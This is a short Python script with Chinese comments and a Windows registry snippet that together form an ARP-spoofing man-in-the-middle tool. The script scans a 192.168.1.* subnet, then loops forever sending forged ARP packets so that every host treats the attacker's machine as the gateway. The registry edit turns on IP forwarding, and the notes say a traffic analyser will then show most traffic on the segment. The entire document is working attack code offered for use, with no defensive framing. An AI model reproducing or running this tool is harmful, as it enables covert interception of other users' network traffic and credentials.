#coding:utf-8
from scapy.all import ARP,send,arping
import sys,re,time
stdout=sys.stdout
IPADDR="192.168.1.*"
gateway_ip="192.168.1.1"
#本机mac地址
gateway_hw="AF:AF:AF:AF:AF:AF"
p=ARP(op = "who-has",hwsrc = gateway_hw,psrc = gateway_ip)
def arp_hack(ip,hw):
t=p
t.hwdst=hw
t.pdst=ip
send(t)
#time.sleep(1)
def get_host():
hw_ip = {}
sys.stdout = open("host.info","w")
arping(IPADDR)
sys.stdout = stdout
f = open("host.info","r")
info = f.readlines()
f.close
del info[0]
del info[0]
del info[0]
del info[0]
for host in info :
temp = re.split(r"\s+",host)
hw_ip[temp[1]] = temp[2]
return hw_ip
if __name__ == "__main__":
hw_ip = get_host()
while 1 :
for i in hw_ip :
arp_hack(hw=i,ip=hw_ip[i])
所有设备网关欺骗
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"IPEnableRouter"=dword:00000001
windows开启ip转发
需要重启!
配合分析器就可查看同网段大部分流量